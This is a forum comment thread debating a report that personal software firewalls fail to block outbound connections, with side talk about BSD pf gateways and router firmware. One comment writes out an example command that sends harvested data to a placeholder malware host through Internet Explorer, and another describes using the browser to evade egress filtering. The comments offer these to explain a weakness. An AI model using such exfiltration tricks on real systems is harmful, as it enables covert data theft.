Personal Firewalls Mostly Useless, Says Mail & Guardian

hweimer writes "More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic. An article in the Mail & Guardian online mentions a test that 'showed that the software often causes more problems than it solves. Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.' Simple PoCs are available, too."

misleading headline

[macadamia_harold]

More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

Re:misleading headline

[iMaple]

Yes, I agree. The title should say " Personal (software) Firewalls Mostly Useless (for out bound traffic)". And that is unpreventable if the user is always logged in as an admin and runs malicious executables (or programs with known security issues, like older versions of browsers). This would be an issue, if a non-admin user could disable the firewall (which I guess is not easy, since the article does not mention that). So there is no real problem with the personal firewall software.

The firewalls are still very useful in preventing attacks due to OS vulnerabilities (like the Windows RPC issues). Anyway that is the main aim of personal firewalls, and the article does not have anything about the effectiveness of the firewall for inbound traffic.

If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall (I use my very old laptop with BSD on it as a gateway)

Re:misleading headline

[marrandy]

Talk about stating the obvious...this is the most useless article I have read in a long time.

1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

2) email issues, people going to bad sites etc. - nothing to do with hardware or software firewalls.

3) People should not run as administrator (or root) - wow, really.

4) People should stay up-to-date on patches - wow, totally amazingly obvious.

As you can't control people, they will always do these things. Good software firewalls show-up issues after they have made these mistakes, when rogue software tries to get out.

They also failed (or I missed it) to mention that software firewalls are good when you have multiple computers behind a hardware firewall - basically and infected computer will be blocked infecting other computers e.g. netbios etc.

Good computer security is a layered concept. From incoming hardware firewalls, IDS, software firewalls on individual computers, user training, security audits etc. I wish people and organizations writing articles would finally learn this. There is no 'magic' one solution.

Re:misleading headline

[bytesex]

Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user. Without this option, a firewall must assume that all traffic with a destination port 80 or 443 (or 25 or whatever) will be legit, allowing all sorts of malware to pretend to browse while doing their actual nasty stuff. On windows, a firewall could even check whether the app in question has a window open, which creates an extra check (this visible application is making network connections).

Re:misleading headline

[Just+Some+Guy]

Yes, I agree. The title should say " Personal (software) Firewalls Mostly Useless (for out bound traffic)".

Actually, you to end with forgot ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot. You could hypothetically write a program that patches a BSD machine's boot sequence with one that unprotects the firewall configuration, alters it, changes the backup file so that the user won't get an email notification later on that details the differences, then resumes normal operation - all while hoping that the user or administrator doesn't notice the spontaneous reboot - but there aren't too many of those running around today.

Re:misleading headline

[creepynut]

Now, I didn't RTFA, but it seems the whole point it is trying to make is that software firewalls AREN'T doing just that.

From the summary:
Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.'

.

Re:misleading headline

[Pieroxy]

I use my very old laptop with BSD on it as a gateway
For a few bucks, you could buy a small linksys dedicated box. That box - in addition of doing the job fine - pumps up less power than a laptop will ever do even in their lowest consumption settings. In a few month, the cost of the Linksys box will be recouped on the electric bill. And it is smaller and heats up less.

My view on the problem at least.

Re:misleading headline

[$1uck]

Can you help someone out by pointing me towards a link to a good site that show's how to set something like that up? I've got a bit of experience with linux and solaris, but mostly use windows. I don't have any experience using BSD (though I'd like to look at it). The more complicated my home network gets, the more I want to put something between the modem and the router. I would love to be able to monitor inbound/outbound traffic block certain sites etc. I can do some of that with the router, or firewalls on individual machines. I'm sure I can find several sites on google, but if you've had a good experience with a particular tutorial please share it with me.

Re:misleading headline

I'm in a similar situation except that my primary gateway is a k6-2 desktop running Ubuntu. However I have a linksys router backing this up. I would shut down the ubuntu box except that the linksys box and the phone companies DSL modem don't play well with each other.

Re:misleading headline

[NVP_Radical_Dreamer]

Even "hardware" firewalls are running software. They just dont do it on the host machine which is where most of nasties reside and thus attempt to disable/circumvent the firewall

Re:misleading headline

[sleep-doc]

An old laptop running linux can be a terrific gateway, set up by someone with the appropriate knowledge base and experience. Set up by someone without those skills, it's a zombie-in-waiting.

Re:misleading headline

[Jamu]

The Proof of Concept, linked to in the story, simply uses Internet Explorer to do its dirty work.

Re:misleading headline

[Pieroxy]

You could try to flash the linksys box firmware to a WRT-DD or other that is less likely to have trouble driving your modem.

Re:misleading headline

[morgan_greywolf]

Right. But they aren't effective in that measure. Joe Sixpack gets a dialog box that says "Application IEXPLORE.exe is attempting to access the Internet" a few thousand times and he just checks "Allow" or, worse "Always Allow" enough times, he doesn't notice when the box says "Application I_pwn_j00.exe is attempting to access the Internet" so, again, he clicks "Always Allow" just like he's always done. Or, he doesn't know what I_pwn_j00.exe is, but that's what he needs to click in order to continue, so that's what he does.

Plus, as the article states, most of these software firewalls allow stuff to get through without popping anything up, and some malware can even bypass the software firewall, as shown in the PoC.

IOW, personal firewalls are not only bad because stuff can get through, either through ignorance, buggy firewall software, or through crafty malware that gets past it, but they're also dangerous in that they create a false sense of security.

The best ways to truly avoid malware are to not download untrusted/unknown software, to use alternatives that are more secure (Firefox vs. IE, gaim vs AIM, Thunderbird vs. Outlook, etc.), to disable macros Microsoft Office, and to run good antivirus and anti-malware applications. Alternatively, one could use a platform that is less susceptible to malware, such as Mac OS X, Linux, or *BSD.

Re:misleading headline

[morcego]

The article's about personal software firewalls, not personal hardware firewalls.

There is no such thing as hardware firewalls. There are software firewalls, and firewall appliances, which are just a software firewall running on a "dedicated" hardware. The hardware itself does no filtering or traffic control.

I happen to agree with the article. I have been saying for years that those personal firewalls aren't worth their weight in salt (yes, I know how much a software weights). What good is it to have a lock after someone already broke into your computer ? Lets face it, the moment a computer gets compromised, it is no longer your computer. It belongs to whoever compromised it.

Don't get me wrong. I don't consider those NAT boxes as firewalls either. When I get a WRT54G, until I have replaced its firmware, and installed a good bunch of iptables rules, I won't consider it any better than, lets say, Zone Alarm. And I'm talking here on the "forbid everything, allow what is necessary" kind of rules.

Personal firewalls are everywhere these days, ranging from old timers like ZoneAlarm, to new runners like Windows XP Firewall from Mickeysoft. And we see how big are the botnets and how far malware spread these days, proving they are far from effective.

Re:misleading headline

[Fred_A]

In an ideal world you'd have to factor in the recycling cost of the laptop though (unless he finds another use for it).
I'm assuming he won't just throw it in the trash and bring it to a recycling facility where some subsidized magic is assumed to take place (although shipping the thing to China is equally plausible).

Re:misleading headline

[bobbonomo]

Brazil Fireall (Linux based) http://www.brazilfw.com.br/

Re:misleading headline

FTA:

The so-called personal firewall programs commonly used with home PCs are not comparable to the powerful firewalls used in companies or public organisations.

All I can say is WELL, DUH!

Re:misleading headline

[value_added]

Can you help someone out by pointing me towards a link to a good site that show's how to set something like that up? I've got a bit of experience with linux and solaris, but mostly use windows. I don't have any experience using BSD ...

I'll offer a suggestion. Install FreeBSD on any old computer with two NICs. You'll find the installation as easy as any Linux system, the routine maintenance probably easier, and the documentation far superiour.

Sit down to read the pf FAQ on OpenBSD's site. It's well written and comprehensive so read from the first page to the last page. Make some coffee and then read it again.

# cd /usr/ports/shells/bash && make install
# echo 'pf_enable="YES"' >> /etc/rc.conf
# echo 'pf_rules="/etc/pf.conf"' >> etc/rc.conf

Edit /etc/pf.conf using the home user scenario provided at the end of the 'pf FAQ'. Reboot and you're good to go.

You'll find pf far less verbose than iptables, ipfw, etc., and easier to learn and to use for that reason among others. There's also lots of additional tools available for pf that will help as well.

$ cd /usr/ports && make search name=pf | less

Google for all the rest.

A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.

Re:misleading headline

[Just+Some+Guy]

For a few bucks, you could buy a small linksys dedicated box.

The one major problem is that he'd no longer be running BSD. It's not trivial to migrate a working firewall config from one OS to the other, as I painfully re-learned when I replaced my FreeBSD host with a WRT54G. It's more or less equivalent featurewise, but the setup is completely different. I particularly missed the PF (BSD firewall) configuration, which is as close as such things can get to being considered beautiful.

Re:misleading headline

[nmos]

In a few month, the cost of the Linksys box will be recouped on the electric bill.

I seriously doubt that. With the screen off and the battery already charged (or removed) a laptop is probably only using maybe 20W or so and the Linksys box on the shelf next to me uses something like 5-10W. You'd have to wait many years to get your $50-$100 investment back at that rate.

Re:misleading headline

If you want a secure outbound firewall the best bet is to use a dedicated gateway machine with the firewall

But then you can't do application-level filtering. What's the point of outbound filtering if you can't tell which process it's coming from?

Re:misleading headline

[Dan+Farina]

Except that the Linksys (Broadcom based, really) NAT boxes consume less power and can perform all of the above in similar. Keep in mind that these devices have a 200mhz ARM processor and 16 MB of RAM, and so are better than many computers that at one time ran BSD, consume less power, and have smaller footprint.

If you insist on having more storage to install programs, one can always use a network mount.

In any case, there's nothing to sneer at about these little devices.

Re:misleading headline

[SilverJets]

Agreeed. I have said it since the days of "Ram Doubler" and "Disk Doubler" (remember them?) "Those are software solutions for hardware problems." If you want a firewall buy a physical device that is a firewall. Do not rely on software on your computer to act as a firewall.

Re:misleading headline

[caseih]

I'd start by learning about the specialized distros for things like linksys. For example, http://www.openwrt.org/ . Google also has lots of things when last I checked. I'm currently running a WRT54GS (older non-broken version) with openwrt. I have a custom bash script that generates the iptables on boot, I run an openvpn client to bridge my home network with another network, and I have iptables rules that allow transparent http filtering and proxying through an external machine (the linksys isn't beefy enough to run squid, privoxy, dansguardian).

Re:misleading headline

[Kazoo+the+Clown]

The article's about personal software firewalls, not personal hardware firewalls. Furthermore, the fact that personal software firewalls are useless and buggy is not really a new discovery.

Yeah, but reminding people of that often is not a bad idea...

Re:misleading headline

[zotz]

does anyone know of such small, low powered boxes with four distinct ethernet interfaces?

one for outside, one for inside, one for dmz and one for wireless.

all the best,

drew
http://www.ourmedia.org/user/17145

Re:misleading headline

[plague3106]

A final comment. Using this approach gives you a secure firewall with all the unixy goodness you'd expect, not to mention logging, SSH, NTP synchronisation, etc that you may want to use as well. And earning the right to sneer at everyone using those plastic Linksys NAT boxes doesn't hurt.

Will your snearing stop when they point out they were on the internet safely yesterday, while you were still deciding all the rules?

Re:misleading headline

[tomjen]

So - ban all ports execpt 80 and 21 (to your isp only) + DNS. When a game does not work unban the needed port, but ban it again when you are done playing it.

Re:misleading headline

[robotsrule]

On Windows boxes there's an added complication. A lot of apps do their Internet access through another application. Then, for example, with ZoneAlarm, you get a message that something like "Services and Controller" application wants to access the Internet, which doesn't help you make a good decision. If you disallow it, you might end up breaking an application and not know why. Windows has a lot of similar problems like this where authority passes through processes in a confusing and unaudited manner. Like when you are trying to delete or rename a file and the only error message you get from Windows is "that file is locked by another application". Unless you have an obscure power user utility from a site such as SysInternals/WinInternals which can tell you who has the file lock, you have no idea which app or apps(s) is holding the file lock.

Re:misleading headline

[Just+Some+Guy]

You cannot patch anything, if the important files have the system immutable (schg) flag set and you are running on securelevel 3. But then you have to reboot to single user mode to change anything.

How often do you find yourself messing with the running configuration of a production server? At the other extreme, I reboot my little laptop all the time because it's ancient and doesn't support suspend well. It's not like an extra reboot once a month is intolerable.

Re:misleading headline

[tomjen]

Lets face it, the moment a computer gets compromised, it is no longer your computer. It belongs to whoever compromised it.

Which is why you need a firewall to prevent you from getting infected in the first place.

Re:misleading headline

[bellers]

>> ..this is the most useless article I have read in a long time.

Are you *sure* about that?

Did you read any of the *other* articles on /. today?

Re:misleading headline

[julesh]

Actually, you to end with forgot ", On Windows". As you probably already know, you can set a BSD system's "securelevel" such that firewall rules, both in kernel and on disk, can't be altered without a reboot.

Doesn't matter, unless your firewall configuration blocks access to the hosts you don't want the malware to communicate with[1] you're pretty much down to using whitelisting of processes that are allowed to communicate. In that case, all you have to do is inject the communication you want to make with the outside world into an authorised process. This is trivially easy in most circumstances. You'd just run down a list of common network utilities until you find one that's in the whitelist and which does what you want it to do.

1: This seems very unlikely to me: pretty much the only way you'd achieve that is by whitelisting hosts you want to communicate with, and who can produce a list of all those hosts? If you get it wrong, you'll have to reboot!

Re:misleading headline

[dgatwood]

It also makes dynamic loading and unloading of device drivers impossible, which is why it doesn't make any sense for desktop system. Security can only be achieved through properly granting permission, not through outright avoiding granting permission. A scheme that is too restrictive will simply get turned off or worked around by the end users, and thus is not particularly useful, and indeed may actually be harmful to security because of developers making security assumptions that are no longer valid in such a situation.

Want to really improve security? Create multiple separate privilege sets in the kernel instead of a single "root". Make different executables setuid to a user with privilege sets that allow certain operations. Your kernel extension loader has sufficient privileges to load a kernel extension, but still can't write directly to kernel memory or listen on low numbered ports or access raw devices or bypass filesystem permissions. Your software that requires the ability to listen on low numbered ports doesn't get permission to bypass filesystem permissions or load kernel extensions. And so on.

Don't get me wrong, it's perfectly okay to have a "root" user, but no executable should ever be setuid root in such a scheme, and that root user should only be used for very limited administrative tasks.

Re:misleading headline

[julesh]

1) Web browser and javascript bugs - nothing to do with hardware or software firewalls.

Wrong. The point is that a software firewall performing egress filtering cannot easily protect against malware that uses the browser to make its outbound connections.

Quote:
Browsers are particularly susceptible, since they are inherently allowed to make a connection with the internet.

What this means is that if I get my malware running on your computer, I can (say) just run "iexplore.exe http://my.malware.site/logging-script.cgi?info=all +the+information+that+ive+harvested+from+your+mach ine". And there's nothing that a software firewall can do to stop me.

Of course, there's little a hardware firewall can do either. Egress filtering is, in the end, a waste of everyone's time, because ultimately it is trivial for malware authors to work around. Remember when everyone was complaining that the XP firewall doesn't do egress filtering? That's actually a good thing: if it did, every bit of malware there is now would be able to work around it. As it is, much of it doesn't bother trying.

OK, so the rest of the article is pointless, and it doesn't explain the problem very well, but what do you expect from a computer security article in the popular press?

Re:misleading headline

[julesh]

Software firewalls on the machine itself can do something hardware firewalls can't; it can check to see that the outbound traffic is coming from a trusted application running as an actually logged on user.

Which is pointless when any application running on the system can just dump details of the communication they want to perform into a javascript in an html file, modify the registry parameters that might prevent internet explorer from executing the script, then run "iexplore.exe c:\malware.html" and do whatever they want with the firewall's blessing.

Trusted processes are meaningless if the trusted process will do whatever the malware asks it to, and once you've got code running on the computer, most web browsers can be configured to do whatever you want them to.

Re:misleading headline

[morcego]

Thats why you need a dedicated firewall, instead of that "personal" thing.

Re:misleading headline

Yes. I have that model, and the Sveasoft firmware is pimp. It has everything I need, and I decommissioned an old HP 120 MHz 486 system running Smoothwall in favor of it. More features, smaller, quieter, and more energy-efficient.

Re:misleading headline

[m_frankie_h]

I meant the need to reboot as an advantage --- as long as the attacker does not have console access, there is not much he can do.

Re:misleading headline

[Just+Some+Guy]

Oh, gotcha. Yep, it's about as locked down as it's possible to make a small modern system.

Re:misleading headline

[slothman32]

So are you saying to get rid of my firewalls?
I have Zone Alarm, BlackIce and a router one.
This is under 95 which no one "cares" about.
But under that and XP you would seem to be for uninstalling them.
This is under a home network with only these two computers on it.

Re:misleading headline

The point of an outgoing firewall is to prevent dumb programs from annoying you about every stupid little upgrade, or from real player telling you about every live concert, etc... Absolutely nothing to do with security. And in the age of software co vs. pirater, I'm going to guess that auto-validation over the internet based on the key entered will become standard, and this isn't a bad way to circumvent it.

Re:misleading headline

[jc42]

does anyone know of such small, low powered boxes with four distinct ethernet interfaces?
one for outside, one for inside, one for dmz and one for wireless.

For that matter, suppose I wanted to do that with a BSD or linux box. Anyone have good suggestions for 4-port ethernet cards? (Or maybe 2 2-port cards, though these days I'd guess it might work just as well if it only used a single card slot.)

It can be hard to know which vendor's PR to most believe.

Re:misleading headline

[zotz]

Looks like multiple ports but not interfaces. Am I missing something?

all the best,

drew

Re:misleading headline

[zotz]

Thanks for the links.

Are you sure they have multiple (more than two) ethernet interfaces and not just two with multiple ports on the internal interface?

all the best,

drew

Re:misleading headline

[Baloo+Ursidae]

More and more security researchs come to the conclusion that personal firewalls are ineffective in controlling outbound traffic.

And utterly craps itself on every little power blip. The laptop has it's own built in UPS. :o) Not all of us are fortunate enough to live far enough away from California that they're not stealing electricity at below market prices after their legislature voted unanimously to pay any far-above-market price for electric.

And if you're Californian, shut some goddamn lights off, or build your own electric plants. The Columbia River's hydroelectric is for us, not you. Los Angeles to San Diego can ignore this, they were smart enough to make themselves electrically self-sufficient long before it became a problem, and Northern California (only Del Norte, Siskiyou and Modoc counties are "northern California", the rest is central or southern) is exempt because essentially nobody lives there to have lights to turn on.

Re:misleading headline

[zotz]

Just for the record, since it seems that everyone has taken it wrong:

I was asking about four ethernet interfaces (that is, you would see eth0, eth1, eth2, and eth3 if the box was running linux) not two interfaces with multiple ethernet ports on the internal interface. I am already running a wrt54g. (Am am not sure whish you are referring to.)

all the best,

drew
(da idea man)

Re:misleading headline

[knightperson]

A Linksys WRT54G series router with the unlocked OpenWRT firmware can do that. Normally the 4-port switch acts like, well, a switch, but you can access the 4 ports separately with the unlocked firmware. Make sure you get one of the "real" Linux-based routers, though. The latest version of the WRT54G has much less memory and is not capable of running OpenWRT (which is an embedded Linux). Most of the GS versions, all of the GL versions, and an assortment of others can be flashed to OpenWRT.

Re:misleading headline

[zotz]

That is what I am running right now, but stock.

So, you are saying that I can have:

192.168.110.0/24 on one
192.168.111.0/24 on two
192.168.112.0/24 on three
192.168.113.0/24 on four

???

Can it really do that? If so, cool.

And then I guess, can the wireless be 192.168.114.0/24 ?

all the best,

drew
(da idea man)

Re:misleading headline

[WuphonsReach]

It's definitely a toss-up for the hardcore geek.

For me it was decided in favor of the non-Linksys solution because I had a VIA C3 600MHz fanless system sitting idle. So I dropped 2 laptop HDs in, rebuilt the unit and installed Smoothwall. Smoothwall configuration took about an hour since I wasn't doing anything complex at the start.

I'm not exactly sure how much power it draws, but the attached 1000VA Smart-UPS estimates that it has about 3 hours of run-time during a power outage. There's also a KVM switch, a DSL modem, and a 16-port gigabit switch plugged into that UPS. One of these weeks I'll drag out the Kill-A-Watt meter and find out for sure how many watts that C3 unit is drawing.

Re:misleading headline

[Jaseoldboss]

But they do a completely different job. My Router controls where traffic can go (eg. not to ad servers) and where it can enter my lan from (hosts that were contacted first).

My software firewall controls what applications are allowed internet access. I've firewalled off IE and Windows Explorer and also that stupid dog that finds files and silently phones home to sa.microsoft.com

Re:misleading headline

[knightperson]

That's my understanding. I've never needed to access the ports separately, but there is a Linux device for "all four switch ports" and several for individual ports. You can assign IP addresses to them in any way that you could a hard drive based Linux box.

Re:misleading headline

[zotz]

From the site:

http://wiki.openwrt.org/OpenWrtDocs/Configuration# head-1f582c0ad21a03a769e00c345743d6cf85ba878f

If it is doing it, it is doing it with vlans and not seperate ethernet interfaces. I will look into it further.

In any case, does anyone know of a small, low power box with the multiple ethernet interfaces I was asking about? (Or a good way to go about building one from easily available components?)

all the best,

drew
(da idea man)

Re:misleading headline

[rainer_d]

> Are you sure they have multiple (more than two) ethernet interfaces and not just two with multiple ports on the internal interface?

Well, they are independant interfaces - but due to architecture limitations, the total interface-to-interface filter-performance is limited.
IIRC, the WRAP maxes out at around 30 MBit/s.
I'm not sure about the Soekris, but it may go a bit higher.
These are really embedded platforms with focus on space- and power-consumption limitation.
They can provide a very powerful solution to home and SOHO users (see www.pfsense.org for a Firewall-One killer).
But their throughput is limited.
For anything that has to be able to cope with multiple saturated FE-interfaces, PCI-X or PCIe is recommeded.

cheers,
Rainer

Told you so

[growse]

Well, that's what happens when you try and introduce a complex topic like network security into the consumer market, and subsequently fail at that task. They (the software manufacturers) fail not only in raising a suitable amount of awareness (if every single computer on the planet was behind a firewall, how many worms/malware would this stop?), but they also fail to do the job properly (not blocking outbound traffic) for those who do install their software.

Re:Told you so

[lightyear4]

Unfortunately, they also create a false sense of security. In my opinion, that is far, far worse.

"Why home firewall software is a leaky dyke"

As a lesbian, I must protest to this offensive and disparaging comment.

Re:"Why home firewall software is a leaky dyke"

It says `leaky', not `soppy' or `sloppy'. What's your problem?

Re:"Why home firewall software is a leaky dyke"

[ArsenneLupin]

You forgot to add closeted, anonymous cowardess, you! ;-)

Re:"Why home firewall software is a leaky dyke"

[voice_of_all_reason]

Cowardess? Sounds like a new D&D class.

can she cast magic missile?

Re:"Why home firewall software is a leaky dyke"

As a lesbian, I must protest to this offensive and disparaging comment.

Geeee.... what a fortuitous coincidence! I am a lesbian to but since my soul is trapped in the body of a big ugly Nerd the crude humor doesn't bother me. It must be due to the high testosterone levels.

Re:"Why home firewall software is a leaky dyke"

[LittleBigLui]

Cowardess? Sounds like a new D&D class.

can she cast magic missile?

To quote from some random D&D handbook I just made up:

Cowardice

• Strength - 0
• Dexterity - 0
• Constitution - 0
• Intelligence - 0
• Wisdom - 0
• Charisma - 25

The Cowardess (or Cowardice as she is more commonly called) doesn't know any magic and her fighting skills are ridiculous. Yet the fact that she has boobies makes nerds in basements around the world drop their swords and wet their pants. To summarize, she's invincible.

Re:"Why home firewall software is a leaky dyke"

You realize, of course, that 'dyke' can also mean: 'a barrier constructed to contain the flow of water or to keep out the sea'. Which, is the definition they're referring to in this case.

God, you're smart.

Re:"Why home firewall software is a leaky dyke"

[ArsenneLupin]

Yet the fact that she has boobies makes nerds in basements around the world drop their swords and wet their pants. To summarize, she's invincible.

Not really. That's where the gay nerd comes into play, hehe ;-)

Re:"Why home firewall software is a leaky dyke"

While you are in the dictionary, Look up humor (or humour :) ).

Outbound Traffic?

[parasonic]

Yes, they may be ineffective in controlling outbound traffic. However, that's not the real point of a personal firewall.

Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories." I'll never forget the day that I left open an unpatched WinXP box after a fresh install. I watched all of the script kiddies and automated worms go at it from my passive OpenBSD monitoring box. That machine was hacked in under ten minutes just because I left it there, open to the Internet. So, useless? No.

Re:Outbound Traffic?

[grub]

You could have put that OpenBSD box inline as a firewall (pf is cool) and still done monitoring. Then your XP box would have been safe.

Re:Outbound Traffic?

[A+beautiful+mind]

I think he was trying to perform an experiment.

Re:Outbound Traffic?

[hweimer]

Without a personal firewall, users have a huge issue with inbound traffic when it comes to security, especially in the Windows "territories."

Inbound traffic can be filtered using the OS-supplied firewall (yes, even under Windows). No need to buy questionable TCP/IP stack replacements.

Re:Outbound Traffic?

[klingens]

Yes, those 3rd party firewall programs are useless since even Windows can now closes ports by default (with their so called "firewall") since XP SP2 2 years ago. Older Windows versions don't have this feature but aren't sold anymore to consumers either. And it's quite rare that consumers buy utility software like this for older PCs anyways. Even if they buy it, the fact that the firewall giving the protection and the firewalled system receiving it are one and the same is not exactly secure. Running under the same account usually to boot. This makes the promised security a total farce in the end.

Re:Outbound Traffic?

[grub]

Oh bah... Colour me "stupid" today. :)

Re:Outbound Traffic?

I suppose the author's perfect firewall would stop all inbound and outbound traffic. It's called a scissors.

Re:Outbound Traffic?

[InsaneGeek]

So your experiment expect people to not apply any Windows patches, but at the same time expect people to install a 3rd party personal firewall??? Is it just me in thinking that there is a very remote probability of this situation actually occuring?

Re:Outbound Traffic?

[CastrTroy]

But you don't need a firewall for that. Simply putting it behind a router with no ports forwarded will pretty much ensure that the script kiddies and worms can't get in.

Re:Outbound Traffic?

[TheGreek]

Simply putting it behind a router with no ports forwarded will pretty much ensure that the script kiddies and worms can't get in.

Until you download MAGIC PORN DIALER 2006.

Re:Outbound Traffic?

[idontgno]

Inbound traffic can be filtered using the OS-supplied firewall (yes, even under Windows).

Most personal firewall products predate the awe-inspiring wonderfullness which is the Windows Firewall. And architecturally, 3rd party software firewalls are comparable to the "integrated" Windows one. (What, you think maybe Microsoft is giving their own firewall developers better hooks into the OS than 3rd-party developers have? While MS has that history, I think they're being too closely watched after numerous high-profile antitrust rulings to get away with it now.)

The only advantage MS's firewall has is... it's included outta-the-box, and enabled by default (after XP SP2).

Again, in theory, the outbound protection can be useful, if the "asking for permission to connect" behavior involves a clueful user. A mouse-monkey mashing the "ok" button for every request pretty well defeats that. So the number one limitation to a useful technical security feature? St00pid lusers. Again.

Re:Outbound Traffic?

[parasonic]

You could have put that OpenBSD box inline as a firewall (pf is cool) and still done monitoring. Then your XP box would have been safe.

That's how I normally operate my network. I run packet filtering and have a lovely, optimized pf.conf that operates smoothly and never gives me any problems. (For months, garbage and books accumulated on the keyboard. It took me a couple of minutes to clear all the stuff from the keyboard. I ran the uptime command as I was packing up shop and was pleasantly pleased to find a four-month uptime before I halted the box.) Turning off the "firewall," I was performing an experiment to prove to myself how quickly an unpatched WinXP box would be compromised--rather, totally owned--and it was quite an eye opener. I sort of expected it, though.

Re:Outbound Traffic?

[ElleyKitten]

So your experiment expect people to not apply any Windows patches, but at the same time expect people to install a 3rd party personal firewall??? Is it just me in thinking that there is a very remote probability of this situation actually occuring?

It's not uncommon for a more tech-savvy person to install a firewall and tell the user to update, but then the user ignores the updates and clicks "yes" when the firewall asks "Do you want to let evil_trojan access the internet?" Well, at least that's how it works at my company, were I install firewalls, antivirus, etc, on laptops, ship them out to employees all over the country, and then get bitched at because they downloaded some viruses. *sigh*

Re:Outbound Traffic?

[SCHecklerX]

This is why, when we were looking for PFW solutions, we settled on using the one built into XP SP2 and above.

Why?

Yeah, it'd be nice to stop the stupid user stuff with outbound attacks and such... but most of that threat is better mitigated through the use of malcode-analyzing proxies and other filtering systems (we quarantine email attachments, haven't had a 0-day in years, use centralized ad and malcode blocking for web browsers, etc).

The REAL threat that we could actually get benefit from using PFW software on was for inbound traffic (ie WORMS). We tested many PFW applications in our labs, and many of them were horrible (They didn't even begin blocking until the user logged in, they opened listening ports for their own management, etc). We found that the firewall bundled with XP SP2, however, is actually a very good product. It is up on boot, DROPS rather than rejects packets, is controllable via scripting, and has good logging. The problem, as always, is in allowing our staff to administer windoze clients remotely. This requires certain ports be opened.

The easiest tradeoff (and we remain worm-free) was to simply block all inbound ports unless the client is connected to a trusted corporate network (in which case we open them all up again). This is done through some Active Directory probing during initialization scripting and also on interface up/down changes. It works very well.

It's not perfect, nor is it the most uber-super secure solution (a user could theoretically bypass our default wireless configuration to bridge while connected to a trusted wired network since our windows AD guy doesn't know a way to dynamically block with the firewall per interface -- it's a risk covered by our security policies which we don't mind). But it does what we need it to do, provides adequate security, and does not disrupt business.

Here are the requirements that we had going into our testing, and the XP SP2 firewall did a very good job at addressing them:

1. If loaded with no policy, default policy is denay all inbound traffic
2. Firewall must be in place on system boot before the launch of any other network services, and prior to user login
3. When connected to untrusted network, policy is deny all inbound
4. When connected to trusted network, policy is allow all
5. When connected to trusted network via IPSec tunnel, policy is allow all
6. Must be centrally managed, integrated with existing management if possible
7. Must be easily mass deployable by desktop services staff
8. Must meet ICSA Labs PC Firewalls Certification Criteria

Re:Outbound Traffic?

[ePhil_One]

3. When connected to untrusted network, policy is deny all inbound
4. When connected to trusted network, policy is allow all

SO how did you accomplish #4? I haven't seen where this is possible with XP SP2's FW. Ideally, I'd like a better test than "This network is the same IP range as my home network"; something like "Thats a valid AD server for my domain, I must be home" would be ideal

Re:Outbound Traffic?

[SCHecklerX]

I think they do the latter, but they may just be checking that the machine's assigned hostname is foo.division.companyname.com. Not the best approach, but it mitigates all but a highly focused attack. This meets our goal, which was to prevent worm infection. Mucking with a DNS server to the point of guessing what we are looking for is an unlikely attack.

Re:Outbound Traffic?

[X0563511]

Any chance you could spare some of us some headaches, frustration, and vulnerability by posting a link to a sanitized version of your script? (sanatized = removing anything personal you wouldnt want public, like open ports)

Re:Outbound Traffic?

[jez9999]

Out of interest, how did you know it was hacked? Was an IRC connection opened to it or something?

Re:Outbound Traffic?

[jez9999]

Does anyone know of an application for Windows (or Linux, even) that can monitor the network utilization of each process running on the system? Many a time I've wanted to know this as I've had Task Manager reporting a constant 25% utilization that looks suspiciously like a spam zombie in action, but *I can't tell what the hell is causing it*!!!

Yes, I know about netstat, and ntop, but neither do quite what I want. netstat doesn't tell you how much bandwidth things are using, and ntop only gives you port numbers, not a mapping between process and network utilization.

It amazes me that people take for granted that you'll be able to monitor exact CPU usage of each process via top or Task Manager, but you don't have the same thing for network utilization. Why? This would be a very useful thing to have. If OS kernels don't have the monitoring functionality currently build in, it should be added. These days, network utilization is almost as important as CPU utilization in many systems.

If it's in it's already too late

[El+Cubano]

Not one of the six firewall programs the magazine tested, regardless of whether commercial or freeware, could prevent all attempts from the test programs at establishing outgoing connections between the PC and the internet.

First, nothing is perfect. Second, if some nasty program/spyware/adware got in, then it's too late already. The best thing is to prevent them getting in to begin with. Besides, most people don't know the difference between what should and should not be allowed to have access. I do some tech support for friends and family and it really gets annoying after the fifteenth call, "Should I let FooBar21.exe access to the Internet?" I finally went with the policy of disabling any sort of outbound filtering in whatever firewall I setup for people I will be "supporting."

Re:If it's in it's already too late

[voice_of_all_reason]

You could also advise them to simply google the .exe file. Every time I've tried this, the first 10 results have always been a group of sites that detail exactly what it's from and a recommendation to allow it or not. Give a man a fish/teach a man to fish and all.

Sure it takes more time, but the only real reason I even use a firewall is to keep winamp and media player from phoning home.

Re:If it's in it's already too late

[RockModeNick]

I did the same thing with my aunt who was always forwarding stupid warnings - I told her if she was REALLY genuinely concerned, she'd take the time to go to www.google.com and input the subject of the email, and see what came up, rather than just blindly forward anything that said to. I used to get 2 terrably dire warnings(tm) from her per month, now down to zero for the past 8 months.

Re:If it's in it's already too late

[julesh]

"When I try that it says 'IEXPLORE.EXE is trying to access the Internet. Do you want to allow it?' What should I do?" ;)

Re:If it's in it's already too late

[jez9999]

I leave my SW firewall always to prompt me when iexplore tries to access the net (FF is my main browser). If this pops up at any time other than JUST AFTER i've told IE to load a website, it doesn't get access.

Annoyance

[damaki]

Personal firewalls do not block outbound connection because it is a pain in the ass to decide what can pass or not. I mean, did you ever try some windows firewall that allows that? You get hundred of warnings from obscure services trying to send unknown data to somewhere you do not want to know. Users are clueless about it, they will just check the box that say "shut up and hack by box" if it prevents further messages from appearing.

Re:Annoyance

[eggoeater]

This is true for most lusers out there, but for geeks like us it's very handy.
